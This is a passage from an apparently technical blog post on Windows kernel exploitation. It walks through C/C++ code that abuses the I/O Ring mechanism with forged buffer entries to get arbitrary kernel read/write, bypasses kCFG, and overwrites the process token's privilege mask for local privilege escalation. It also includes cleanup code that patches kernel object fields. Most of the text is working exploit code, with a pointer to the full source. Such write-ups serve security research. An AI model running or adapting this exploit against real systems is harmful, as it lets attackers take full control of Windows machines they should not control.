            requestDataBuffer,
            size,
            0,
            FILE_WRITE_FLAGS_NONE,
            NULL,
            IOSQE_FLAGS_NONE);
        if (!SUCCEEDED(result))
        {
            printf("[-] Failed building IO ring write file structure: 0x%x\n", result);
            return FALSE;
        }
    
        result = SubmitIoRing(handle, 1, INFINITE, &submittedEntries);
        if (!SUCCEEDED(result))
        {
            printf("[-] Failed submitting IO ring: 0x%x\n", result);
            return FALSE;
        }
        printf("[*] submittedEntries = %d\n", submittedEntries);
        //
        // Check the completion queue for the actual status code for the operation
        //
        result = PopIoRingCompletion(handle, &cqe);
        if ((!SUCCEEDED(result)) || (!NT_SUCCESS(cqe.ResultCode)))
        {
            printf("[-] Failed reading kernel memory 0x%x\n", cqe.ResultCode);
            return FALSE;
        }
    
        BOOL res = ReadFile(outputPipe,
            pOut,
            size,
            &bytesRead,
            NULL);
        if (!res)
        {
            printf("[-] Failed to read from output pipe: 0x%x\n", GetLastError());
            return FALSE;
        }
        printf("[+] Successfully read %lu bytes from kernel address 0x%p.\n", bytesRead, TargetAddress);
        return res;
    }

KWrite() is actually quite similar. It takes as input:

TargetAddress: the target kernel-space address we want to write to.
pValue: a buffer holding the data we want to write.
size: the amount of bytes in pValue that we want to write.

It performs the following operations:

Write the buffer from pValue to our InputPipe.
Zero-out the IOP_MC_BUFFER_ENTRY struct at fake_buffers[0] and set TargetAddress and size in IOP_MC_BUFFER_ENTRY.Address and IOP_MC_BUFFER_ENTRY.Length.
Call BuildIoRingReadFile() and SubmitIoRing() to trigger the IoRing to read IOP_MC_BUFFER_ENTRY.Length bytes from our InputPipe and write them to IOP_MC_BUFFER_ENTRY.Address.

BOOL KWrite(PVOID TargetAddress, PBYTE pValue, SIZE_T size) {

    DWORD bytesWritten = 0;
    HRESULT result;
    UINT32 submittedEntries;
    IORING_CQE cqe;

    printf("[*] Writing to %p the following bytes\n", TargetAddress);
    printf("[*] pValue = 0x%p\n", pValue);
    printf("[*] data: ");
    for (SIZE_T i = 0; i < size; i++) {
        printf("0x%x ",pValue[i]);
    }
    printf("\n");
    if (WriteFile(inputPipe, pValue, size, &bytesWritten, NULL) == FALSE)
    {
        result = GetLastError();
        printf("[-] Failed to write into the input pipe: 0x%x\n", result);
        return FALSE;
    }
    printf("[*] bytesWritten = %d\n", bytesWritten);
    //
    // Point the fake buffer entry at TargetAddress, the kernel address to overwrite.
    // Use the client's handle of the input pipe for the read operation
    //
    memset(fake_buffers[0], 0, sizeof(IOP_MC_BUFFER_ENTRY));
    fake_buffers[0]->Address = TargetAddress;
    fake_buffers[0]->Length = size;
    fake_buffers[0]->Type = 0xc02;
    fake_buffers[0]->Size = 0x80;
    fake_buffers[0]->AccessMode = 1;
    fake_buffers[0]->ReferenceCount = 1;

    auto requestDataBuffer = IoRingBufferRefFromIndexAndOffset(0, 0);
    auto requestDataFile = IoRingHandleRefFromHandle(inputClientPipe);

    printf("[*] performing buildIoRingReadFile\n");
    result = BuildIoRingReadFile(handle,
        requestDataFile,
        requestDataBuffer,
        size,
        0,
        NULL,
        IOSQE_FLAGS_NONE);
    if (!SUCCEEDED(result))
    {
        printf("[-] Failed building IO ring read file structure: 0x%x\n", result);
        return FALSE;
    }

    result = SubmitIoRing(handle, 1, INFINITE, &submittedEntries);
    if (!SUCCEEDED(result))
    {
        printf("[-] Failed submitting IO ring: 0x%x\n", result);
        return FALSE;
    }
    printf("[*] submittedEntries = %d\n", submittedEntries);
    return TRUE;
}

Using our read/write primitives

Now it is just a matter of calling KRead()/KWrite() for reading from/writing to any kernel-space address. In this case we will just elevate our privileges, even if, as already outlined at the beginning, we could do much more.

Using this library, you can also call arbitrary kernel functions once you obtain kernel read/write primitives (it won’t work if kCET is enabled though).

So, let’s create an IncrementPrivileges() function that uses KRead()/KWrite() to read and write the token privileges of the current process.

VOID IncrementPrivileges() {
        HANDLE TokenHandle = NULL;
        PVOID tokenAddr = NULL;
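        // Bail out early: without a token handle there is no address to read from.
        if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &TokenHandle)) {
            printf("[-] OpenProcessToken failed: %lu\n", GetLastError());
            return;
        }
        tokenAddr = GetKAddrFromHandle(TokenHandle);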
        printf("[+] tokenHandle = 0x%p\n", TokenHandle);
        printf("[+] tokenAddr = 0x%p\n", tokenAddr);
    
        _SEP_TOKEN_PRIVILEGES original_privs = { 0 };
    
        printf("[*] Reading original token privileges...\n");
    
        KRead((PVOID)((DWORD64)tokenAddr + 0x40), (PBYTE)&original_privs, sizeof(original_privs));
        printf("[+] original_privs.Present = 0x%llx\n", original_privs.Present);
        printf("[+] original_privs.Enabled = 0x%llx\n", original_privs.Enabled);
        printf("[+] original_privs.EnabledByDefault = 0x%llx\n", original_privs.EnabledByDefault);
        //KRead64((PVOID)((DWORD64)tokenAddr + 0x40), (PDWORD64)&tokenAddr);
    
        _SEP_TOKEN_PRIVILEGES privs = { 0 };
        privs.Enabled = 0x0000001ff2ffffbc;
        privs.Present = 0x0000001ff2ffffbc;
        privs.EnabledByDefault = original_privs.EnabledByDefault;
    
        printf("[*] Writing token privileges...\n");
    #ifdef _DEBUG
        getchar();
    #endif
        KWrite((PVOID)((DWORD64)tokenAddr + 0x40), (PBYTE) & privs, sizeof(privs));
    
        printf("[*] Reading modified token privileges...\n");
        _SEP_TOKEN_PRIVILEGES modified_privs = { 0 };
        KRead((PVOID)((DWORD64)tokenAddr + 0x40), (PBYTE)&modified_privs, sizeof(modified_privs));
        printf("[+] modified_privs.Present = 0x%llx\n", modified_privs.Present);
        printf("[+] modified_privs.Enabled = 0x%llx\n", modified_privs.Enabled);
        printf("[+] modified_privs.EnabledByDefault = 0x%llx\n", modified_privs.EnabledByDefault);
        return;
    }
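
To make the 0x0000001ff2ffffbc mask a little less opaque, here is a minimal sketch of how such a bitmask can be decoded. It assumes that bit N of the Present/Enabled fields corresponds to the privilege whose LUID value is N (the well-known values from the Windows headers, e.g. 20 for SeDebugPrivilege). The helper names HasPrivilege() and AddPrivilege() and the k-prefixed constants are made up for illustration and are not part of the exploit code.

```cpp
#include <cassert>
#include <cstdint>

// Well-known privilege LUID values (assumed to match the Windows SDK/WDK headers).
constexpr unsigned kSeMachineAccountPrivilege = 6;
constexpr unsigned kSeTcbPrivilege            = 7;
constexpr unsigned kSeLoadDriverPrivilege     = 10;
constexpr unsigned kSeDebugPrivilege          = 20;

// Mask written to Present and Enabled in IncrementPrivileges().
constexpr uint64_t kFullPrivilegeMask = 0x0000001ff2ffffbcULL;

// Returns true when the bit for the given privilege LUID is set in the mask.
bool HasPrivilege(uint64_t mask, unsigned luid) {
    assert(luid < 64);
    return ((mask >> luid) & 1ULL) != 0;
}

// Returns a copy of the mask with the bit for the given privilege switched on.
uint64_t AddPrivilege(uint64_t mask, unsigned luid) {
    assert(luid < 64);
    return mask | (1ULL << luid);
}
```

With these helpers, HasPrivilege(kFullPrivilegeMask, kSeDebugPrivilege) evaluates to true, while bit 6 (SeMachineAccountPrivilege under the assumption above) is one of the few bits left clear. A more targeted variant of the attack could start from the original Present value and add single bits with AddPrivilege() instead of overwriting the whole field.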

Cleaning up

As outlined in this blog post, when using an I/O ring we have to reset both _IORING_OBJECT.RegBuffers and _IORING_OBJECT.RegBuffersCount to zero. In addition, since we pre-registered a buffer, it is also recommended to decrement the reference count of the process. We are going to implement all of this in our cleanup() function.

We first get a handle to the current process, hProc, and then obtain eproc, the kernel address of the corresponding _EPROCESS struct, by calling GetKAddrFromHandle(). We finally use KRead() and KWrite() to update the reference count at eproc - 0x30 (_EPROCESS is always preceded by an _OBJECT_HEADER struct that keeps track of the reference count in its PointerCount field).

After that we just need to issue one last KWrite() that sets _IORING_OBJECT.RegBuffers and _IORING_OBJECT.RegBuffersCount to zero.
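
The 0x30 offset can be double-checked with a small stand-in for the header. The sketch below assumes the x64 _OBJECT_HEADER layout as published in the public symbols (PointerCount at offset 0x00 and Body at offset 0x30); ObjectHeaderMock and PointerCountAddress() are hypothetical names used only for this illustration, and the layout may differ on other builds.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Simplified mock of the x64 _OBJECT_HEADER (assumed layout, not the real definition).
struct ObjectHeaderMock {
    int64_t  PointerCount;        // 0x00: reference count patched in cleanup()
    int64_t  HandleCount;         // 0x08
    uint64_t Lock;                // 0x10
    uint8_t  TypeIndex;           // 0x18
    uint8_t  TraceFlags;          // 0x19
    uint8_t  InfoMask;            // 0x1a
    uint8_t  Flags;               // 0x1b
    uint32_t Reserved;            // 0x1c
    uint64_t ObjectCreateInfo;    // 0x20
    uint64_t SecurityDescriptor;  // 0x28
    uint64_t Body;                // 0x30: first bytes of the object (e.g. _EPROCESS)
};

static_assert(offsetof(ObjectHeaderMock, PointerCount) == 0x00, "PointerCount must be first");
static_assert(offsetof(ObjectHeaderMock, Body) == 0x30, "Body must start at 0x30");

// Given the address of an object body, returns the address of its PointerCount field.
uint64_t PointerCountAddress(uint64_t objectBody) {
    assert(objectBody >= offsetof(ObjectHeaderMock, Body));
    return objectBody - offsetof(ObjectHeaderMock, Body)
                      + offsetof(ObjectHeaderMock, PointerCount);
}
```

Under these assumptions, PointerCountAddress(eproc) is the same address as the eproc - 0x30 expression used in cleanup().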

VOID cleanup() {
    // Drop the extra process reference left behind by the pre-registered buffer.
    HANDLE hProc = OpenProcess(MAXIMUM_ALLOWED, FALSE, GetCurrentProcessId());

    if (hProc != NULL)
    {
        auto eproc = GetKAddrFromHandle(hProc);
        printf("[+] eproc = 0x%p\n", eproc);
        DWORD64 refCount = 0;
        // _OBJECT_HEADER.PointerCount lives 0x30 bytes before the _EPROCESS body.
        if (eproc != NULL && KRead((PVOID)((DWORD64)eproc - 0x30), (PBYTE)&refCount, sizeof(DWORD64))) {
            printf("[+] refCount = 0x%llx\n", refCount);
            if (refCount > 0) {
                printf("[*] refCount > 0\n");
                refCount--;
                if (KWrite((PVOID)((DWORD64)eproc - 0x30), (PBYTE)&refCount, sizeof(DWORD64))) {
                    printf("[+] refCount decremented\n");
                }
                else {
                    printf("[-] Failed to decrement refCount\n");
                }
            }
            else {
                printf("[*] refCount is already 0\n");
            }
        }
        else {
            printf("[-] Failed to read refCount\n");
        }
        CloseHandle(hProc);
    }
    else {
        printf("[-] Failed to open handle to current process.\n");
    }

    // 16 zero bytes cover both RegBuffersCount (+0xb0) and RegBuffers (+0xb8).
    BYTE towrite[16] = { 0 };
    printf("[*] Cleaning up...\n");
    printf("[*] Setting RegBuffersCount and RegBuffers to 0.\n");
#ifdef _DEBUG
    getchar();
#endif
    if (!KWrite((PVOID)((DWORD64)ioringaddress + 0xb0), (PBYTE)towrite, sizeof(towrite))) {
        printf("[-] cleanup failed during KWrite\n");
    }
    if (g_device != INVALID_HANDLE_VALUE) {
        CloseHandle(g_device);
    }
    if (puioring != NULL) {
        // Clear the user-mode view of the registered buffers before closing the ring.
        puioring->RegBufferArray = NULL;
        puioring->BufferArraySize = 0;
        CloseIoRing((HIORING)puioring);
    }
}
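
The final 16-byte write in cleanup() can be pictured as a small patch applied at offset 0xb0 of the I/O ring object. The sketch below is only a user-mode model: it assumes RegBuffersCount is a 32-bit field at +0xb0 followed by padding and the 64-bit RegBuffers pointer at +0xb8, and it applies the patch to a local byte array in place of the real KWrite(). RegBuffersPatch and ResetRegBuffers() are hypothetical names.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Offset of RegBuffersCount inside _IORING_OBJECT, as used by cleanup().
constexpr size_t kRegBuffersCountOffset = 0xb0;

// Assumed layout of the 16 bytes overwritten by cleanup().
struct RegBuffersPatch {
    uint32_t RegBuffersCount;  // +0xb0
    uint32_t Padding;          // +0xb4: alignment padding
    uint64_t RegBuffers;       // +0xb8: pointer to the registered buffer array
};

static_assert(sizeof(RegBuffersPatch) == 16, "patch must cover exactly 16 bytes");
static_assert(offsetof(RegBuffersPatch, RegBuffers) == 8, "RegBuffers must follow at +8");

// Zeroes both fields in a local copy of the object bytes (stand-in for KWrite()).
void ResetRegBuffers(uint8_t* objectBytes, size_t objectSize) {
    assert(objectBytes != nullptr);
    assert(objectSize >= kRegBuffersCountOffset + sizeof(RegBuffersPatch));
    RegBuffersPatch patch = {};  // all fields zero
    std::memcpy(objectBytes + kRegBuffersCountOffset, &patch, sizeof(patch));
}
```

Writing both fields in a single operation keeps the count and the pointer consistent with each other, which is presumably why the exploit uses one 16-byte KWrite() instead of two separate writes.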

Launching the exploit

Now we can run the exploit and see that we successfully elevate our privileges while bypassing kCFG!

Running our modified exploit and getting LPE

Full exploit code is available in the branch named vbs of the GitHub repo.

Note: The code also shows how to use the gadget alone to elevate token privileges. To test it, it should be enough to uncomment the line //#define TOKENPRIV 1.

Conclusion

In this article, I briefly introduced the HVCI and kCFG security mitigations and their impact on our original exploit. After that, I described a way to bypass kCFG and showed how to use the I/O Ring technique to obtain an arbitrary read/write primitive in kernel space. Finally, I showed how to craft an exploit that uses this read/write primitive to elevate the current process's token privileges.

Credits

Connor McGarr for his blog post on HVCI and the other security mitigations in the Windows kernel.
Paolo Stagno and @tykawaii98 for their blog post on how to bypass kCFG and the discovery of the gadget.
Yarden Shafir for the discovery and explanation of the I/O Ring technique, used to obtain arbitrary read/write.

Contacts

If you have any questions, feel free to reach out at:
